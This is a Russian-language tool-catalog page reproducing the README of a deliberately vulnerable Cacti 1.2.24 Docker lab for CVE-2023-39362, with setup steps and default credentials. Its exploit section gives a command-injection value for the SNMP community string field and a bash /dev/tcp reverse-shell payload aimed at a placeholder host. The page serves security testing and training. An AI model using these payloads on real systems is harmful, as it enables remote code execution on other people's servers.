Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cacti-rce-snmp-options-vulnerable-application — ПРЕДУПРЕЖДЕНИЕ: Это уязвимое приложение для тестирования эксплойта для инъекции команд в Cacti (CVE-2023-39362). Запускайте на свой страх и риск! | Kitploit
Инструменты/GitHubGitHub/m3ssap0/cacti-rce-snmp-options-vulnerable-application
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеОбучение и ОбразованиеЛаборатории и Практика
GitHubm3ssap0/cacti-rce-snmp-options-vulnerable-application

cacti-rce-snmp-options-vulnerable-application

ПРЕДУПРЕЖДЕНИЕ: Это уязвимое приложение для тестирования эксплойта для инъекции команд в Cacti (CVE-2023-39362). Запускайте на свой страх и риск!

РепозиторийСайт
61 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимое приложение Cacti v1.2.24 с аутентифицированным внедрением команд (CVE-2023-39362)

Это уязвимое приложение для проверки эксплойта для уязвимости Cacti (CVE-2023-39362).

ПРЕДУПРЕЖДЕНИЕ!

Это приложение содержит серьезные уязвимости безопасности. Запускайте его на свой страх и риск! Рекомендуется использовать изолированную среду с резервным копированием (например, виртуальную машину с недавним снимком и сетью только для хоста). Не загружайте это приложение на серверы, доступные из Интернета, так как они будут скомпрометированы.

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Я не несу ответственности за то, как кто-либо использует это приложение. Единственная цель этого приложения — быть тестовым сценарием для эксплойта CVE-2023-39362, и его не следует использовать со злым умыслом. Если ваш сервер будет скомпрометирован при установке этого приложения, это не моя ответственность, а ответственность лица(лиц), которые его загрузили и установили.

Информация об уязвимости

  • CVE-ID: CVE-2023-39362
  • Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362
  • Description: В Cacti 1.2.24 при определенных условиях аутентифицированный привилегированный пользователь может использовать вредоносную строку в параметрах SNMP устройства, выполняя внедрение команд и получая удаленное выполнение кода на базовом сервере.

Использование

Вот шаги по настройке среды:

  1. Запустите docker compose up -d, чтобы запустить композицию.
  2. Вы можете завершить шаги, перейдя по адресу http://127.0.0.1/cacti, чтобы запустить мастер инициализации Cacti. Если вы получите ошибку, связанную с базой данных, просто подождите немного и обновите страницу.
  3. Учетные данные по умолчанию: admin/admin.
  4. Нажимайте "Далее" на всех кнопках во время мастера, выбирая соответствующие параметры. Все значения по умолчанию должны подойти, и все обязательные предварительные требования должны быть выполнены.
  5. После установки войдите как admin.
  6. Перейдите в "Console" > "Configuration" > "User".
  7. Нажмите на пользователя guest.
  8. Включите его, установите пароль, отключите "Must Change Password at Next Login", если хотите.
  9. Нажмите кнопку "Save".
  10. Перейдите в раздел "Permissions".
  11. В разделе "General Administration" включите "Console Access" и "Sites/Devices/Data".
  12. Нажмите кнопку "Save".
  13. Выйдите и снова войдите как guest, чтобы попробовать эксплойт.

Контейнер будет называться vuln-cacti.

Имя хоста для тестового SNMP-устройства — monitored_snmp_device.

Для удаления среды используйте команду docker compose down.

Официальное руководство по установке Cacti можно найти здесь.

Первопричина

Подробное описание первопричины уязвимости доступно в оригинальном уведомлении о безопасности или в моем блоге.

Эксплойт

(Это только один из возможных эксплойтов)

  1. Перейдите в "Console" > "Create" > "New Device".
  2. Создайте устройство, поддерживающее SNMP версии 1 или 2.
  3. Убедитесь, что устройство имеет графики с одним или несколькими шаблонами:
    • "Net-SNMP - Combined SCSI Disk Bytes"
    • "Net-SNMP - Combined SCSI Disk I/O"
    • (Создание устройства из шаблона "Net-SNMP Device" удовлетворит требования к графикам)
  4. В разделе "SNMP Options" для поля "SNMP Community String" используйте значение, например: public\' ; touch /tmp/m3ssap0 ; \'.
  5. Нажмите кнопку "Create".
  6. Проверьте наличие созданного файла в /tmp.

Для получения обратного шелла можно использовать полезную нагрузку, подобную следующей.

public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

Авторы

  • Antonio Francesco Sardella - автор отчета об уязвимости - m3ssap0

Лицензия

Этот проект лицензирован под лицензией Unlicense - подробности см. в файле LICENSE.

Скачать инструмент